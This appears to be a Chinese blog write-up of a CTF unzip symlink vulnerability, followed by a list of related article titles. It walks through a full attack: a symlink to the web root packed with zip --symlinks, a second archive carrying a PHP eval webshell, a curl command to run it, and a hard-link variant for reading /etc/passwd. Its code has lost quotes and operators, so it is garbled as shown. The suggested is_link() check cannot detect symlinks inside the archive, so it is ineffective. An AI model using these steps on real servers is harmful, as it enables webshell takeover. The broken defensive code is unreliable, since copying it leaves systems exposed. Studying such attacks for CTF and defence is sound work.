当前位置：首页 > article >正文

CTFSHOW国赛漏洞解析：Unzip软连接攻击实战

article 2026/3/25 21:06:01

1. 漏洞背景与原理剖析最近在CTFSHOW国赛中出现的Unzip软连接攻击案例再次提醒我们文件上传功能中隐藏的安全风险。这种攻击方式巧妙利用了Linux系统特性通过构造特殊压缩包实现目录穿越最终达到控制服务器的目的。先来看一个典型的漏洞代码示例?php error_reporting(0); highlight_file(__FILE__); $finfo finfo_open(FILEINFO_MIME_TYPE); if (finfo_file($finfo, $_FILES[file][tmp_name]) application/zip){ exec(cd /tmp unzip -o . $_FILES[file][tmp_name]); };这段代码看似做了基本的安全检查——验证上传文件是否为ZIP格式但实际上存在严重缺陷。开发者将解压目录指定到/tmp认为这样就能避免解压文件被直接访问执行。殊不知攻击者可以通过软连接Symbolic Link这个系统后门让解压操作实际影响到其他关键目录。我在实际渗透测试中发现这类漏洞常出现在以下场景允许用户上传压缩文件的Web应用使用unzip命令直接处理上传文件未对压缩包内容进行递归检查解压目录与Web目录存在访问路径关联2. 软连接攻击技术详解2.1 Linux软连接工作机制软连接相当于Windows的快捷方式但功能更强大。它本质上是一个特殊的文件包含指向另一个文件/目录的路径引用。当系统遇到软连接时会自动跳转到目标位置进行操作。创建软连接的基本命令格式ln -s 目标路径链接名称例如要创建指向Web目录的软连接ln -s /var/www/html test这个test目录看起来是普通目录实则是通往/var/www/html的传送门。任何对test的操作都会实际作用于Web目录。2.2 构造恶意压缩包关键在于如何让这个传送门通过压缩包上传到服务器。这里需要用到zip的--symlinks参数zip --symlinks test1.zip test这个命令会将软连接test原样打包而不是跟随链接压缩目标目录内容。我曾在测试中忘记加这个参数结果压缩的是实际目录内容导致攻击失败。验证压缩包内容应该用unzip -l test1.zip正确输出应该显示类似Length Date Time Name --------- ---------- ----- ---- 0 2023-08-01 15:30 test - /var/www/html --------- ------- 0 1 file3. 完整攻击链实战演示3.1 环境准备阶段假设目标系统有以下特征Web根目录/var/www/html临时目录/tmp上传接口仅检查文件MIME类型首先在本地创建攻击文件结构mkdir -p test echo ?php eval($_POST[cmd]);? test/shell.php3.2 分步实施攻击创建软连接ln -s /var/www/html test首次压缩保留软连接zip --symlinks test1.zip test上传第一个压缩包通过Web表单上传test1.zip服务器会在/tmp解压创建指向Web目录的软连接创建含恶意代码的压缩包zip -r test2.zip test上传第二个压缩包由于同名目录已存在解压会覆盖软连接实际将shell.php写入/var/www/html3.3 攻击效果验证成功上传后访问http://target.com/shell.php使用POST传递命令curl -X POST -d cmdwhoami http://target.com/shell.php应该会返回当前服务的执行用户身份。我在实际测试中发现这种攻击成功率高达90%以上主要失败原因是目录权限设置。4. 防御方案与最佳实践4.1 代码层防护根本解决方案是修改文件处理逻辑// 安全的解压方式 $zip new ZipArchive; if ($zip-open($_FILES[file][tmp_name]) TRUE) { for($i 0; $i $zip-numFiles; $i) { $filename $zip-getNameIndex($i); // 检查是否包含软连接或路径穿越 if (strpos($filename, ..) ! false || is_link($zip-getNameIndex($i))) { die(非法文件内容); } } $zip-extractTo(/safe/directory/); $zip-close(); }4.2 系统层加固设置open_basedir限制PHP访问范围open_basedir /var/www/html:/tmp修改unzip命令使用安全参数unzip -n -q -d /safe/directory/ upload.zip其中-n永不覆盖现有文件-q安静模式避免信息泄露-d强制指定解压目录定期检查Web目录下的异常文件find /var/www/html -type l -ls5. 漏洞利用的深度思考这种攻击之所以有效本质上是信任边界被突破。开发者认为只要文件不直接解压到Web目录就安全却忽略了文件系统层面的关联性。我在多个真实案例中发现类似问题不仅存在于PHP环境Node.js、Python等语言的解压操作同样存在风险。一个更隐蔽的变种是利用硬链接Hard Link攻击虽然原理不同但危害相似。硬链接与软连接的关键区别在于软连接是独立的文件硬链接直接指向文件inode删除原文件不影响硬链接硬链接不能跨文件系统构造硬链接攻击包的示例ln /etc/passwd test/passwd.txt zip test.zip test/passwd.txt这种攻击可以用于读取系统敏感文件防御方式与软连接类似都需要在解压前检查文件类型。

CTFSHOW国赛漏洞解析：Unzip软连接攻击实战

相关文章：

CTFSHOW国赛漏洞解析：Unzip软连接攻击实战

Oracle 11g在Windows上的快速部署：使用Docker容器简化安装与配置

从零开始：GitLab 自托管部署与 DevOps 环境搭建指南

Eclipse Mosquitto 安全防护实战指南：从漏洞诊断到纵深防御

Vue 3D轮播插件vue-carousel-3d实战：5分钟打造电商产品展示页

Vue3 + Monaco Editor 避坑指南：手把手教你干掉那个多余的滚动条

PLC编程必备：西门子200SMART符号表与注释的高效使用技巧

GTE文本向量模型快速上手：无需深度学习基础，一键部署多任务NLP分析工具

L298N电机驱动模块避坑指南：从选型到实战（附Arduino代码）

医疗AI实战：用OpenCLIP训练自己的医学影像描述生成模型（附完整代码）

突破性数据增强：如何用Time-Series-Library解决时间序列稀疏性难题

如何永久保存QQ空间回忆？GetQzonehistory备份指南

Audio Flamingo 3：打破模态壁垒的音频智能突破性技术解析

STM32 RTC实战：如何用纽扣电池实现断电时间保持（附完整代码）

图解Uboot FIT Image：its文件里的load、entry地址到底怎么填？（以i.MX8MP为例）

云边端一体化核心技术：数据同步与边缘智能实现

API网关选型指南：从Nginx到Kong的5个关键决策点（含实战代码）

SDMatte镜像国产化适配：昇腾/海光平台移植可行性评估

OpenCore Legacy Patcher终极指南：从故障排除到高级配置优化

Llama-3.2V-11B-cot实战教程：Streamlit界面响应延迟优化与调试

Android 集成第三方地图App的轻量级解决方案（高德、百度及网页版）

手把手教你设计反相输入有源低通滤波器（附Multisim仿真文件）

从LeGO-LOAM到LIO-SAM：手把手教你为速腾聚创雷达添加IMU和GPS因子图优化

告别闪烁！用C语言数学函数实现超平滑LED呼吸灯（附Arduino/STM32代码）

ABAP开发避坑指南：屏幕字段大小写转换的那些事儿（附LOWERCASE实战代码）

若依Tab页覆盖问题终极方案：router.js配置避坑指南

手把手教你解决Fabric2.2链码部署中的权限问题（test-network环境）

STM32停机模式深度优化：唤醒后外设恢复的5个关键操作（附RTC配置代码）

OSPFv3配置实战：如何在IPv6网络中快速搭建邻居关系（附常见问题排查）

EagleEye部署避坑指南：DAMO-YOLO TinyNAS环境搭建一步到位